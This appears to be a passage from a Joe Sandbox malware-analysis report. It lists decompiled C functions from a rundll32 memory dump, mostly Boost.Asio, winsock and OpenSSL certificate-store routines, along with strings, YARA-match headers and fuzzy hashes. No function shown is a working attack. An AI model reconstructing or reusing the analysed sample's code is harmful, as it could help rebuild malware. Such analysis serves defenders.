                                        				if (E000001C31C338828C50(r8w & 0xffffffff, __rcx,  *((intOrPtr*)(__rcx + 0x468))) != 0xffff) goto 0x38813efe;
                                        				 *(_t150 + 0x28) = _t118;
                                        				goto 0x38813f01;
                                        				 *(_t150 + 0x28) =  *(_t150 + 0x28) + 1;
                                        				if (1 == 0) goto 0x38813f61;
                                        				_t114 =  *( *(_t150 + 0x18)) & 0x0000ffff;
                                        				 *(_t150 + 0x42) = _t114;
                                        				if (_t114 != 0) goto 0x38813d61;
                                        				 *(_t150 + 0x18) =  &(( *(_t150 + 0x18))[1]);
                                        				 *((intOrPtr*)(_t150 + 0x470)) =  *((intOrPtr*)(_t150 + 0x470)) + 1;
                                        				if ( *((intOrPtr*)(_t150 + 0x470)) != 2) goto 0x38813d56;
                                        				return  *(_t150 + 0x28);
                                        			}

















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: cc965d7d74c4e5544afed584674b14193e697925cffd20aaa08f296383d6cb39
                                        • Instruction ID: f17b141850934d5fa54123255d3a3ca6d39b10402c1222f8de5cc23c1a9a2d0b
                                        • Opcode Fuzzy Hash: cc965d7d74c4e5544afed584674b14193e697925cffd20aaa08f296383d6cb39
                                        • Instruction Fuzzy Hash: 0E71B6721903D086F7688F28C044AAC3BB5F785F18F14B117DE668A699DF3ACB85C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000001C31C33870BB60(intOrPtr* __rcx, void* __rdx, void* __r8, void* __r10) {
                                        				signed int _t22;
                                        				intOrPtr* _t39;
                                        				intOrPtr _t43;
                                        				void* _t46;
                                        				intOrPtr _t51;
                                        
                                        				_t46 = __r8;
                                        				_t22 =  *(__rcx + 0x10) & 0x000000ff;
                                        				if (_t22 != 1) goto 0x3870bb86;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x48) goto 0x3870bc2c;
                                        				goto E000001C31C33870EB20;
                                        				if (_t22 != 2) goto 0x3870bba5;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x38) goto 0x3870bc2c;
                                        				goto 0x3870fdc0;
                                        				if (_t22 != 3) goto 0x3870bc27;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				_t51 =  *__rcx;
                                        				if ( *((intOrPtr*)(__rcx + 8)) != _t51 + 0x28) goto 0x3870bc2c;
                                        				_t43 =  *((intOrPtr*)(_t51 + 0x10));
                                        				r10d = 0;
                                        				_t39 =  *((intOrPtr*)(_t51 + 8));
                                        				if (_t39 == _t43) goto 0x3870bc0a;
                                        				_t14 = _t39 + 0x32; // 0xccccc35fe38b4928
                                        				r8d =  *_t14 & 0x0000ffff;
                                        				_t16 = _t46 + 2; // 0xccccc35fe38b492a
                                        				if ( *_t39 != _t43) goto 0x3870bbd0;
                                        				if (_t16 + __rdx + __r10 == 0) goto 0x3870bc0a;
                                        				if ( *(__rcx + 0x10) == 0) goto 0x3870bc00;
                                        				 *(__rcx + 0x10) = 0;
                                        				 *((long long*)(__rcx + 8)) =  *((intOrPtr*)(_t51 + 8));
                                        				 *(__rcx + 0x10) = 4;
                                        				return _t22;
                                        			}









                                        Strings
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chun, xrefs: 000001C338711F3F
                                        • invalid iterator, xrefs: 000001C338711F0C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chun
                                        • API String ID: 0-301515690
                                        • Opcode ID: 0f6c08defd031064c914add2131498418f1c90f84a6fe79c585a60161cdf5400
                                        • Instruction ID: 06b658013764d6cb096ff616e8940dc30f1b66c5478c2a033f850f9024073f2b
                                        • Opcode Fuzzy Hash: 0f6c08defd031064c914add2131498418f1c90f84a6fe79c585a60161cdf5400
                                        • Instruction Fuzzy Hash: C371CE73146BD496FB918B18D048B993BE1F305B49FA4E916C66C463A0DB7DC786C343
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000001C31C33882846C(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                        				void* _t11;
                                        				void* _t13;
                                        				intOrPtr* _t21;
                                        				intOrPtr* _t35;
                                        
                                        				_t21 = _t35;
                                        				 *((long long*)(_t21 + 8)) = __rbx;
                                        				 *((long long*)(_t21 + 0x10)) = __rbp;
                                        				 *((long long*)(_t21 + 0x18)) = __rsi;
                                        				 *((long long*)(_t21 + 0x20)) = __rdi;
                                        				r15b = r9b;
                                        				_t10 =  >  ? __ebx : 0;
                                        				_t11 = ( >  ? __ebx : 0) + 9;
                                        				if (__rdx - _t21 > 0) goto 0x388284d1;
                                        				_t13 = E000001C31C338818984(_t21);
                                        				 *_t21 = 0x22;
                                        				E000001C31C338811BC8(_t13);
                                        				return 0x22;
                                        			}








                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: e+000$gfff
                                        • API String ID: 3215553584-3030954782
                                        • Opcode ID: 869a70dfdbdc3df35be45184b0e9f6a1c57ae12249e54dc23cd95b0bcfd1e6cd
                                        • Instruction ID: 03f72d251336008955dbbd47696b7b7380cd17f47d5396eeb6be1960a89e5176
                                        • Opcode Fuzzy Hash: 869a70dfdbdc3df35be45184b0e9f6a1c57ae12249e54dc23cd95b0bcfd1e6cd
                                        • Instruction Fuzzy Hash: 6A5105727547C086FB258F39E94179DAB91F341B90F08E626CAB84BBD6CA2CC544C702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E000001C31C33870BC30(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rsi, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                        				long long _v16;
                                        				char _v24;
                                        				char _v32;
                                        				char _v40;
                                        				char _v48;
                                        				long long _v56;
                                        				void* __rdi;
                                        				intOrPtr* _t105;
                                        				long long _t117;
                                        				intOrPtr _t123;
                                        				long long _t124;
                                        				intOrPtr* _t132;
                                        				intOrPtr* _t134;
                                        
                                        				_t105 = __rax;
                                        				_a16 = __rdx;
                                        				_v56 = 0xfffffffe;
                                        				_a8 = __rbx;
                                        				_a24 = __rsi;
                                        				_t134 = __rcx;
                                        				if (( *(__rcx + 0x20) & 0x000000ff) != 1) goto 0x3870bd61;
                                        				_t129 =  *__rcx + 0x10;
                                        				E000001C31C338708C60( &_v32,  *__rcx + 0x10);
                                        				_t132 = _t105;
                                        				_t117 = _t134 + 8;
                                        				E000001C31C33870BB60(_t117, _t129, __r8, __r10);
                                        				if ( *_t117 ==  *_t132) goto 0x3870bc88;
                                        				goto 0x3870bcf0;
                                        				if (0 ==  *((intOrPtr*)(_t132 + 0x10))) goto 0x3870bc95;
                                        				goto 0x3870bcf0;
                                        				if (0 == 0) goto 0x3870bcee;
                                        				if (0 != 1) goto 0x3870bcaa;
                                        				goto 0x3870bcf0;
                                        				if (0 != 2) goto 0x3870bcbb;
                                        				goto 0x3870bcf0;
                                        				if (0 != 3) goto 0x3870bccc;
                                        				goto 0x3870bcf0;
                                        				if (0 != 4) goto 0x3870bcdd;
                                        				goto 0x3870bcf0;
                                        				if (0 != 5) goto 0x3870bcee;
                                        				goto 0x3870bcf0;
                                        				_v16 = 0;
                                        				if (1 == 0) goto 0x3870bdff;
                                        				_t123 =  *_t134;
                                        				asm("movups xmm1, [ecx]");
                                        				asm("psrldq xmm1, 0x8");
                                        				asm("dec ax");
                                        				if ( *((intOrPtr*)(_t132 + 8)) == 0) goto 0x3870bd3d;
                                        				if (1 == 0) goto 0x3870bd31;
                                        				if (1 != 1) goto 0x3870bd2d;
                                        				_a16 = _t117;
                                        				if ( *((char*)(_t117 + 0x10)) == 0) goto 0x3870bd2d;
                                        				 *((char*)(_t117 + 0x10)) = 0;
                                        				 *((char*)(_t117 + 0x18)) = 0;
                                        				 *_t117 = _t123;
                                        				 *((char*)(_t117 + 0x18)) = 2;
                                        				goto 0x3870bdff;
                                        				if (1 == 0) goto 0x3870bd58;
                                        				if (1 != 1) goto 0x3870bd54;
                                        				_a16 = _t117;
                                        				if ( *((char*)(_t117 + 0x10)) == 0) goto 0x3870bd54;
                                        				 *((char*)(_t117 + 0x10)) = 0;
                                        				 *((char*)(_t117 + 0x18)) = 0;
                                        				 *((char*)(_t117 + 0x18)) = 3;
                                        				goto 0x3870bdff;
                                        				if (1 != 2) goto 0x3870bda2;
                                        				_t124 = _t123 + 8;
                                        				 *_t124 =  *_t124 + 0x10;
                                        				if ( *_t124 !=  *_t134 + 0x10) goto 0x3870bdff;
                                        				if (1 == 0) goto 0x3870bd9c;
                                        				if (( *(_t124 + 0x18) & 0x000000ff) != 1) goto 0x3870bd98;
                                        				_a16 = _t124;
                                        				if ( *((char*)(_t124 + 0x10)) == 0) goto 0x3870bd98;
                                        				 *((char*)(_t124 + 0x10)) = 0;
                                        				 *(_t124 + 0x18) = 0;
                                        				 *(_t124 + 0x18) = 3;
                                        				goto 0x3870bdff;
                                        				_v32 = 0x3889d200;
                                        				_v24 = 0x3889d200;
                                        				_v16 = 0x3889d200;
                                        				_v48 = "invalid iterator";
                                        				_v40 = 1;
                                        				E000001C31C33880E0E4(_t117,  &_v48,  &_v24, _t132, _t134);
                                        				_v32 = 0x3889d240;
                                        				r9d = 0xd9;
                                        				return E000001C31C338710190(0x3889d240, _t117,  &_v32, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::asio::const_buffer>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,2> &)", _t132);
                                        			}

















                                        APIs
                                        Strings
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas, xrefs: 000001C33870BDED
                                        • invalid iterator, xrefs: 000001C33870BDBA
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas
                                        • API String ID: 592178966-3009069526
                                        • Opcode ID: 007dedca1d4c0c60add468d157471b5fdec836d95774991d8197f5e944365b8d
                                        • Instruction ID: a156f6157f0ac326bd6bc2d13793457989e3824d33c784b12fbe8d4c61aceb52
                                        • Opcode Fuzzy Hash: 007dedca1d4c0c60add468d157471b5fdec836d95774991d8197f5e944365b8d
                                        • Instruction Fuzzy Hash: 2351B272048BC881FB218F29D05C7AA67A2F711B4CF58A553D6A90779ACB3DC792C343
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E000001C31C33870BEF0(intOrPtr* __rcx) {
                                        				signed int _t10;
                                        				void* _t16;
                                        				intOrPtr _t18;
                                        
                                        				_t10 =  *(__rcx + 0x10) & 0x000000ff;
                                        				if (_t10 != 1) goto 0x3870bf3c;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				_t18 =  *__rcx;
                                        				_t16 =  *((intOrPtr*)(_t18 + 0x30)) + 0x10;
                                        				if ( *((intOrPtr*)(__rcx + 8)) != _t16) goto 0x3870bfcd;
                                        				asm("movups xmm1, [edx+0x20]");
                                        				asm("psrldq xmm1, 0x8");
                                        				asm("dec ax");
                                        				if (_t16 == 0) goto 0x3870bf52;
                                        				if ( *(__rcx + 0x10) == 0) goto 0x3870bf33;
                                        				 *(__rcx + 0x10) = 0;
                                        				 *((long long*)(__rcx + 8)) = _t18 + 0x20;
                                        				 *(__rcx + 0x10) = 2;
                                        				return _t10;
                                        			}







                                        APIs
                                        Strings
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(con, xrefs: 000001C33871211A
                                        • invalid iterator, xrefs: 000001C3387120E7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(con
                                        • API String ID: 1552479455-1729322650
                                        • Opcode ID: e65c547b6365f5cc188a16297207a4218a11443e47f1737acb69d2afbe79d735
                                        • Instruction ID: 2accb268655ad08b222882c2dc5256dfaf90267492869c83e940920f6650a99b
                                        • Opcode Fuzzy Hash: e65c547b6365f5cc188a16297207a4218a11443e47f1737acb69d2afbe79d735
                                        • Instruction Fuzzy Hash: AC519CB2146BC485FB25C72CD4487C86BA1F715B0CFB8D616D2AC463A1EB6AC787C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 52%
                                        			E000001C31C3388205A8(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, void* __r14, void* _a8, long long _a16, long long _a24) {
                                        				long long _v0;
                                        				long long _v40;
                                        				void* __rdi;
                                        				void* _t13;
                                        				void* _t16;
                                        				void* _t19;
                                        				intOrPtr* _t27;
                                        				struct _IO_FILE* _t29;
                                        				long long _t40;
                                        				void* _t42;
                                        				void* _t44;
                                        				long long _t49;
                                        				void* _t55;
                                        				long long _t60;
                                        
                                        				_t60 = __r8;
                                        				_t21 = __edx;
                                        				_a8 = __rbx;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_t19 = r8d;
                                        				_t13 = E000001C31C33882C4B0(3, __edx, __rax);
                                        				if (_t13 == 1) goto 0x3882060c;
                                        				if (_t13 != 0) goto 0x388205e7;
                                        				if (E000001C31C33882C360() == 1) goto 0x3882061b;
                                        				r8d = _t19;
                                        				_t29 = _a8;
                                        				_t49 = _a24;
                                        				_t44 = _t42;
                                        				goto 0x3881fb98;
                                        				r8d = _t19;
                                        				E000001C31C338820430(_t29, _t49, _t44, _t44, _t49, __r14);
                                        				asm("int3");
                                        				r8d = _t19;
                                        				_t40 = _t44;
                                        				_t35 = _t49;
                                        				_t16 = E000001C31C338820430(_t29, _t49, _t40, _t44, _t49, __r14);
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				_t27 = _t55 - 0x20 + 0x20;
                                        				 *((long long*)(_t27 + 0x10)) = _t40;
                                        				 *((long long*)(_t27 + 0x18)) = _t60;
                                        				 *((long long*)(_t27 + 0x20)) = _v0;
                                        				_push(_t29);
                                        				_push(_t49);
                                        				_push(_t44);
                                        				E000001C31C33871E120(_t16);
                                        				r9d = 0;
                                        				_v40 = _t27 + 0x18;
                                        				return E000001C31C338816A00(_t21, _t35,  *_t27, _t35, _t40, _v0);
                                        			}


















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _set_error_mode
                                        • String ID: Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1949149715-326578492
                                        • Opcode ID: 2dd39899cc4fd0f326fce0ac12fbf1610e5e71e1dfc9f846380327674395893b
                                        • Instruction ID: 05957a3b3597166714ebe9cbbb48f48348c9ed2c965853134ffd0ddfeed6fb74
                                        • Opcode Fuzzy Hash: 2dd39899cc4fd0f326fce0ac12fbf1610e5e71e1dfc9f846380327674395893b
                                        • Instruction Fuzzy Hash: F11134B175079081F6249B03E9419AEE755FB84FC0F64E423EF580BF96CE38C6518741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E000001C31C3386EFE70(signed int __esi, long long __rax, long long __rbx, long long __rcx, void* __rdx, void* __rsi, long long __rbp, long long _a8, long long _a16, long long _a24, long long _a32) {
                                        				char _v424;
                                        				long long _v440;
                                        				char _v456;
                                        				long long _v464;
                                        				char _v472;
                                        				void* _t24;
                                        				void* _t25;
                                        				long long _t34;
                                        				long long _t49;
                                        				void* _t55;
                                        				void* _t57;
                                        
                                        				_t39 = __rcx;
                                        				_t36 = __rbx;
                                        				_t34 = __rax;
                                        				_a8 = __rcx;
                                        				_v440 = 0xfffffffe;
                                        				_a32 = __rbx;
                                        				_t49 = __rcx;
                                        				E000001C31C3386EED10(__rax, __rbx, __rcx, __rsi);
                                        				asm("lock xadd [0x21b78c], eax");
                                        				if (1 != 1) goto 0x386efebf;
                                        				__imp__#115();
                                        				 *0x3890b634 = 2;
                                        				asm("lock xadd [0x21b76b], ebx");
                                        				if (0 == 0) goto 0x386efeed;
                                        				E000001C31C33880D880(_t39,  &_v424);
                                        				_v472 = 0;
                                        				_v464 = _t34;
                                        				E000001C31C3386EE680("winsock");
                                        				E000001C31C33880B674(_t34,  &_v472);
                                        				_a24 = _t34;
                                        				r8d = r8d | 0xffffffff;
                                        				_t24 = E000001C31C3386EF1F0(__esi, _t36, _t34, _t49, __rbp);
                                        				_a16 = _t34;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x30], xmm0");
                                        				_t25 = E000001C31C3387012B0(_t24,  &_v456, _t49, _t55, _t57);
                                        				E000001C31C3386EEB30();
                                        				_a16 = 0;
                                        				 *((long long*)(_t49 + 0x10)) = _t34;
                                        				return _t25;
                                        			}















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: winsock
                                        • API String ID: 724789610-334210494
                                        • Opcode ID: 70537df99092b06e4699692229b9079a3b595157778dbcd8d4209e0eeee3e64e
                                        • Instruction ID: ecd4db2a630da570fed824ebd2e34cfddc76fbc5f9cfdbfbcc700dddcd334ca4
                                        • Opcode Fuzzy Hash: 70537df99092b06e4699692229b9079a3b595157778dbcd8d4209e0eeee3e64e
                                        • Instruction Fuzzy Hash: A721B6326807C042F7209B54F5847DAB361FB857A4F10A326A7B5476AADF7CD2448B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E000001C31C3386EFF70(signed int __esi, long long __rax, long long __rbx, long long __rcx, void* __rdx, void* __rsi, long long __rbp, long long _a8, long long _a16, long long _a24, long long _a32) {
                                        				char _v424;
                                        				long long _v440;
                                        				char _v456;
                                        				long long _v464;
                                        				char _v472;
                                        				void* _t24;
                                        				void* _t25;
                                        				long long _t34;
                                        				long long _t49;
                                        				void* _t55;
                                        				void* _t57;
                                        
                                        				_t39 = __rcx;
                                        				_t36 = __rbx;
                                        				_t34 = __rax;
                                        				_a8 = __rcx;
                                        				_v440 = 0xfffffffe;
                                        				_a16 = __rbx;
                                        				_t49 = __rcx;
                                        				E000001C31C3386EED10(__rax, __rbx, __rcx, __rsi);
                                        				asm("lock xadd [0x21b68c], eax");
                                        				if (1 != 1) goto 0x386effbf;
                                        				__imp__#115();
                                        				 *0x3890b634 = 2;
                                        				asm("lock xadd [0x21b66b], ebx");
                                        				if (0 == 0) goto 0x386effed;
                                        				E000001C31C33880D880(_t39,  &_v424);
                                        				_v472 = 0;
                                        				_v464 = _t34;
                                        				E000001C31C3386EE680("winsock");
                                        				E000001C31C33880B674(_t34,  &_v472);
                                        				_a32 = _t34;
                                        				r8d = r8d | 0xffffffff;
                                        				_t24 = E000001C31C3386EF1F0(__esi, _t36, _t34, _t49, __rbp);
                                        				_a24 = _t34;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x30], xmm0");
                                        				_t25 = E000001C31C3387012B0(_t24,  &_v456, _t49, _t55, _t57);
                                        				E000001C31C3386EEB30();
                                        				_a24 = 0;
                                        				 *((long long*)(_t49 + 0x10)) = _t34;
                                        				return _t25;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: winsock
                                        • API String ID: 724789610-334210494
                                        • Opcode ID: cd8b77f64586fd2a68ec8b93f49a1d5773b384db4c11cb8a7c144c2275384ded
                                        • Instruction ID: 2d13ba878124f1d0bd8dc828b5f798a009b780a2978b29102537ff108b19be82
                                        • Opcode Fuzzy Hash: cd8b77f64586fd2a68ec8b93f49a1d5773b384db4c11cb8a7c144c2275384ded
                                        • Instruction Fuzzy Hash: 7A21C5326807C083F7209F58E5847DAB361FB857A4F10A326A7B9476EADF7CC2448B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E000001C31C3386F00B0(long long __rax, long long __rbx, void* __rcx) {
                                        				long long _v8;
                                        				long long _v16;
                                        				long _v24;
                                        				long _t14;
                                        				void* _t15;
                                        				long long _t23;
                                        				intOrPtr _t27;
                                        				void* _t29;
                                        
                                        				_t23 = __rax;
                                        				_t27 =  *((intOrPtr*)(__rcx + 0x10));
                                        				_t2 = _t27 + 0x34;
                                        				 *_t2 = 1;
                                        				if ( *_t2 != 0) goto 0x386f0105;
                                        				_t4 = _t27 + 0x38;
                                        				 *_t4 = 1;
                                        				if ( *_t4 != 0) goto 0x386f0105;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0x386f0105;
                                        				_v8 = __rbx;
                                        				_t14 = GetLastError();
                                        				_v24 = _t14;
                                        				_t15 = E000001C31C33880D880( *((intOrPtr*)(_t27 + 0x28)), _t29);
                                        				_v16 = _t23;
                                        				if (_t14 != 0) goto 0x386f010a;
                                        				return _t15;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CompletionErrorInit_thread_footerLastPostQueuedStatus
                                        • String ID: pqcs
                                        • API String ID: 1235608404-2559862021
                                        • Opcode ID: 1d1bc266588ec55be32d97afc5100d9174a4c41dbe7fa0ea700753218c8ec9d3
                                        • Instruction ID: 01a437385b9b751fcdec7b610c4bab86cbc86478897310a6b07815d0a812c6a6
                                        • Opcode Fuzzy Hash: 1d1bc266588ec55be32d97afc5100d9174a4c41dbe7fa0ea700753218c8ec9d3
                                        • Instruction Fuzzy Hash: 6B11E236740B8185FB618B18E440B9A7360FB84754F54A322EEBD0B7A0EF38C6528702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,3> &, xrefs: 000001C338711C64
                                        • invalid iterator, xrefs: 000001C338711C34
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,3> &$invalid iterator
                                        • API String ID: 1552479455-487838338
                                        • Opcode ID: 81102135a62a48b02b4cb08a7679de3dbc5be90462a9374d6e47661d34dc8c28
                                        • Instruction ID: 5228dee451b3fefaa368ad3b00ea33dbabe372cfd7198cf3f6c195f4537e86d2
                                        • Opcode Fuzzy Hash: 81102135a62a48b02b4cb08a7679de3dbc5be90462a9374d6e47661d34dc8c28
                                        • Instruction Fuzzy Hash: 54016132364B8095F740DB14E584B9D6365F7843A0F51A222DA7D4B7A5EB39CA96C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderRaiseThrow__std_exception_copy
                                        • String ID: asio.misc
                                        • API String ID: 435636982-1213265728
                                        • Opcode ID: 80bd005db408badd54749ad8a33016f3392768a8e73afec91e094aba6e83ab38
                                        • Instruction ID: 54a8f6c8cfc102b1aed4c3026d6d9c9931e9ef5e04bd14e94bc1b8d00fb2616b
                                        • Opcode Fuzzy Hash: 80bd005db408badd54749ad8a33016f3392768a8e73afec91e094aba6e83ab38
                                        • Instruction Fuzzy Hash: F5111D32159FC195E6618B18F8807CAB3B4F785354F50A226E6ED46AB9EF38C295CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 24%
                                        			E000001C31C338730650(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r9, long long _a8, long long _a24, void* _a56) {
                                        				intOrPtr _t25;
                                        				long long _t30;
                                        				void* _t33;
                                        				char* _t35;
                                        
                                        				_t33 = __rcx;
                                        				_a8 = __rbx;
                                        				E000001C31C33880C220();
                                        				if (__rdx != 0) goto 0x38730680;
                                        				_t25 =  *((intOrPtr*)(__rcx + 0x28));
                                        				_t30 =  !=  ? _t25 : "MY";
                                        				_t35 = "Opening certificate store %s\n";
                                        				E000001C31C33872D790(_t25, _t35, _t30, __r9);
                                        				r9d =  *((intOrPtr*)(__rcx + 0x38));
                                        				r8d = 0;
                                        				_a24 = _t30;
                                        				__imp__CertOpenStore();
                                        				if (_t25 != 0) goto 0x387306ea;
                                        				if ( *0x38909020 != 0) goto 0x387306c3;
                                        				 *0x38909020 = E000001C31C338721CE0(_t25);
                                        				_a24 = 0x56d;
                                        				_t7 = _t35 + 1; // 0x6e
                                        				r8d = _t7;
                                        				E000001C31C3387222D0(_t12, 0x6d,  *0x38909020, _t25, _t25, _t33, _t35, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				return E000001C31C33872DA10( *0x38909020, _t25, _t35);
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
